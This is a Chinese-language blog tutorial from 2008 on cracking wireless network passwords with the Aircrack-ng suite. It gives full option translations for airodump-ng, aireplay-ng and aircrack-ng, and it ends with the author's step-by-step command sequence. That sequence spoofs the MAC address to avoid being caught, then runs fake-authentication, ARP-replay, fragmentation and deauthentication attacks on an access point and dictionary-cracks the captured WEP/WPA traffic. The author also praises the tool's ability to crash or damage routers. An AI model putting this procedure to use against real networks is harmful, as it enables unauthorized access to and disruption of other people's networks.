无线破解攻击工具使用详解

引用请注明作者和来源,鄙视抄袭冒充。本文原创（技术说明文档由本人参照英文原文翻译）,作者:MHY_MHY, email:mayc66@gmail.com,欢迎指出错误.最初发表在 http://blog.csdn.net/mhy_mhy ,最后修改17:00 2008/11/6。

      本文主要是针对无线网络的密码破解，使用平台 linux 2.26.21.5 ,实现环境 BACKTRACK 3 FINAL(USB),无线破解工具 Aircrack-ng ，官方网站http://www.aircrack-ng .org ，Aircrack-ng系列工具也有windows 平台版本，但是本人的小黑的始终不能在win下抓包，所以只能 弃 win 从 lin 了，另外 win 下扫描到的 AP 也比 lin 下少了很多。其实 WIN 并不完整的支持 TCP/IP 协议族，有些协议 win 直接丢弃不用。网络本来从一开始就是 unix 的天下，win 只是在后来加入了网络的功能。

Aircrack-ng工具包有很多工具，我用到的工具主要有以下几个：
airmon-ng       处理网卡工作模式
airodump-ng     抓包
aircrack-ng     破解
aireplay-ng     发包，干扰
另外还要用到以下 linux 命令:
ifconfig        查看修改网卡状态和参数
macchanger      伪造 MAC
iwconfig        主要针对无线网卡的工具 (同 ifconfig)
iwlist          获取无线网络的更详细信息
另外还有其他的 linux 基本命令，我就不提示了。

      具体破解步骤：
1. 修改无线网卡状态：先 down 掉
2. 伪造无线网卡的 MAC 地址：安全起见，减少被抓到的可能
3. 修改网卡工作模式：进入Monitor状态，会产生一个虚拟的网卡
4. 修改无线网卡状态： up
5. 查看网络状态，记录下 AP 的 MAC 和本机的 MAC ，确定攻击目标
6. 监听抓包：生成 .cap 或 .ivs
7. 干扰无线网络：截取无线数据包，发送垃圾数据包，用来获得更多的有效数据包
8. 破解  .cap 或 .ivs  ，获得 WEP 密码，完成破解

 

      下面详细介绍一下各个命令的基本用法（参照命令的英文说明）

1. ifconfig
用来配置网卡，我们这里主要用来 禁用和启用 网卡：
ifconfig ath0 down   
ifconfig ath0 up      
禁用一下网卡的目的是为了下一步修改 MAC 。

2.macchanger
用来改变网卡的 MAC 地址，具体用法如下：
usage: macchanger [options] device
-h 显示帮助
-V 显示版本
-s 显示当前MAC
-e 不改变mac,使用硬件厂商写入的MAC
-a 自动生成一个同类型的MAC，同厂商的
-A 自动生成一个不同类型的MAC，不同厂商的
-r 生成任意MAC
-l 显示已知厂商的网卡MAC地址分配，这个很有用，可以根据MAC查出来是哪个厂商生产的产品
-m 设置一个自定义的MAC  如: macchanger --mac=00:34:00:00:00:00 ath0 。

3.airmon-ng
启动无线网卡进入 Monitor 模式，
useage: airmon-ng <start|stop|check> <interface> [channel]
<start|stop|check>  启动，停止，检测
<interface>         指定无线网卡
[channel]           监听频道，现代大多数无线路由默认是 6，随便扫描一下都是这个频道，网管们应该换换了

4.iwconfig
专用的无线网卡配置工具，用来配置特殊的网络信息，不带参数时显示可用网络。
useage：iwconfig interface [options]
[essid{NN|ON|OFF}]                  指定essid号 开启关闭
[nwid{NN|on|off}]                   指定网络id号 开启关闭
[mode {managed|ad-hoc|....}]        指定无线网络工作模式/类型
[freq N.NNNN[K|M|G]]                指定工作频率
[channel N]                         指定频道
[ap {N|off|auto}]                   指定AP号 关闭/自动
[sens N]                            sens 号
[nick N]                            nick 号
[rate {N|auto|fixed}]               速率控制
[rts {N|auto|fixed|off}]            rts控制，如果不知道什么是RTS，那就回去好好去学网络，不用往下看了
[frag {N|auto|fixed|off}]           碎片控制
[enc {NNNN-NNNN|off}]               范围
[power {period N|timeout N}]        电源 频率/超时
[retry {limit N|lifetime N}]        重试 限次/超时
[txpower N{mw|dBm}]                 功率 毫瓦/分贝
[commit]                            处理

5.iwlist
主要用来显示无线网卡的一些附加信息,同上
useage: iwlist [interface] options
scanning      扫描
frequency     频率
channel       频道
bitrate       速率
rate          速率
encryption    加密
key           密钥
power         电源
txpower       功率
ap            ap
accespoints   ap
peers         直连
event         事件

6.airodump-ng
抓包工具,我最喜欢用的,详细用法如下:
usage: airodump-ng <options> <interface>[,<interface>,...]

  Options:
      --ivs               :仅将抓取信息保存为 .ivs
      --gpsd              :使用 GPSd
      --write    <prefix> :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分
      -w                  :同 --write
      --beacons           :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的
      --update     <secs> :显示更新延迟,没有用过
      --showack           :显示ack/cts/rts状态,还是那句,不知道rts就不用看了
      -h                  :隐藏已知的,配合上面的选项使用
      -f          <msecs> :跳频时间
      --berlin     <secs> :无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻 译的都会有出入,这是我的理解.(mhy_mhy注)
      -r           <file> :从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵

  Filter options:
      --encrypt   <suite> : 使用密码序列过滤 AP
      --netmask <netmask> : 使用掩码过滤 AP
      --bssid     <bssid> : 使用 bssid 过滤 AP
      -a                  : 过滤无关的客户端
                
默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:

      --channel <channels>:指定频道
      --band <abg>        :制定带宽
      -C    <frequencies> :指定频率MHz
      --cswitch  <method> : 设置频道交换方式
                    0     : FIFO (default)         先进先出(默认)
                    1     : Round Robin            循环
                    2     : Hop on last            最后一跳
      -s                  : 同上
      --help              : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文

 

 

7.aireplay-ng

搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的 AP 设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.

usage: aireplay-ng <options> <replay interface>

  Filter options:

      -b bssid  : AP的 MAC
      -d dmac   : 目标的 MAC
      -s smac   : 来源的 MAC
      -m len    : 最小包长度
      -n len    : 最大包长度
      -u type   : 帧控制, type    field
      -v subt   : 帧控制, subtype field
      -t tods   : 帧控制, To      DS bit
      -f fromds : 帧控制, From    DS bit
      -w iswep  : 帧控制, WEP     bit
      -D        : 禁用 AP 发现功能

  Replay options:

      -x nbpps  : 每秒包数量
      -p fctrl  : 框架设定 (hex)
      -a bssid  : 设置AP的 mac
      -c dmac   : 设置目标的 MAC
      -h smac   : 设置来源的 mac
      -g value  : 改变环缓存大小 (默认8)
      -F        : 选择第一个匹配的包

      Fakeauth attack options:

      -e essid  : 设置目标 AP 的 SSID
      -o npckts : 每秒爆破的包数量 (0 自动, 默认 1)
      -q sec    : 存活时间 秒
      -y prga   : 共享可信的 key流

      Arp Replay attack options:

      -j        : 注入 fromDS 数据包,还没有用过这个选项

      Fragmentation attack options:

      -k IP     : 设置目的IP 碎片
      -l IP     : 设置源IP碎片

      Test attack options:

      -B        : 激活 bitrate 测试

  source options:

      -i iface  : 设置抓包的接口设备
      -r file   : 从pcap文件析取数据包

  attack modes (Numbers can still be used):   攻击模式，最具杀伤力的地方

      --deauth      count : 不信任一切                   (-0)
      --fakeauth    delay : 欺骗AP的信任                 (-1)
      --interactive       : 交互的选择                   (-2)
      --arpreplay         : 标准的 ARP-request replay    (-3)
      --chopchop          : 解密 WEP 包                  (-4)
      --fragment          : 生成有效的 key流             (-5)
      --caffe-latte       : 从客户端获取新的 IVs         (-6)
      --cfrag             : 对客户端进行碎片攻击         (-7)
      --test              : 测试注射及效果               (-9)

      --help              : 显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付 那些不给出作者就引用的人,鄙视抄袭.

 

8.aircrack-ng
破解KEY,漫长的过程.漫不漫长取决于两个方面: 一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.

usage: aircrack-ng [options] <.cap / .ivs file(s)>

  Common options:

      -a <amode> : 暴破 (1/WEP, 2/WPA-PSK)
      -e <essid> : 选择 essid 为目标
      -b <bssid> : 选择 ap的 mac 为目标,就是破解识别的关键字
      -q         : 使用安静模式,无数出模式
      -C <macs>  : 将所有的 AP 合并为一个虚拟的

  Static WEP cracking options:

      -c         : 仅搜索字母数字
      -t         : 仅搜索二进制
      -h         : 搜索数字关键字 (用于坏掉的部分),翻译不出来了
      -d <mask>  : 指定掩码(A1:XX:CF:YY)
      -m <maddr> : 用 MAC 匹配可用的数据包
      -n <nbits> : WEP 长度  64/128/152/256/512
      -i <index> : WEP 索引(1 to 4), default: any
      -f <fudge> : 暴破强度 默认2,原文字面意思是"禽兽强迫 捏造 事实",呵呵
      -k <korek> : 禁用一种破解方式 (1 to 17)
      -x or -x0  : 禁用最新关键字暴破
      -x1        : 使用最新关键字暴破 默认
      -x2        : 用最新两个字节暴破
      -y         : 实验单线程模式
      -K         : KoreK 攻击 (pre-PTW)
      -s         : 显示为 ASCII
      -M <num>   : 最大数量 ivs 使用
      -D         : WEP 非隐蔽模式
      -P <num>   : PTW debug: 1 disable Klein, 2 PTW
      -1         : 尝试一次 PTW

  WEP and WPA-PSK cracking options:

      -w <words> : 指定目录文件,可以多个
      -r <DB>    : 制定 airolib-ng 数据库,不能和 -w 一起使用
 
     --help     : 显示这个帮助

说明:

好了,用法都解释完了,主要是后面这三个命令,这是我从英文译过来的,结合我的使用情况,以及我的理解.参数全,没有漏掉任何一项,可能我是第一个把这个完整翻译过来的,之前我没有找到有翻译好的,有些地方并不是准确的遵循原文,希望感兴趣的朋友在转载的时候注上我:mhy_mhy.

 

下面以我的硬件实例来操作一下:
我的硬件是 atheros 的 a/b/g 无线网卡，在 linux 中显示为 ath0 ，我只列出我常用的命令步骤，不再做任何解释：

ifconfig ath0 down
macchanger -r ath0
macchanger -r wifi0
ifconfig ath1 up
airmon-ng start ath1 6
iwconfig ath1
iwlist ath1 scanning
airodump-ng -w *.cap -c 6 ath1

aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1
aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x  1024  ath1
aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath1
aireplay-ng -3 -b <AP MAC> -h <my MAC> -i ath1

aircrack-ng -x -f 2 *.cap
aircrack-ng -w passdict.txt *.cap
aircrack-ng -n 64 -b apmac *.ivs
aircrack-ng -w passdict.txt -b 00:00:00:00:00:00 *.cap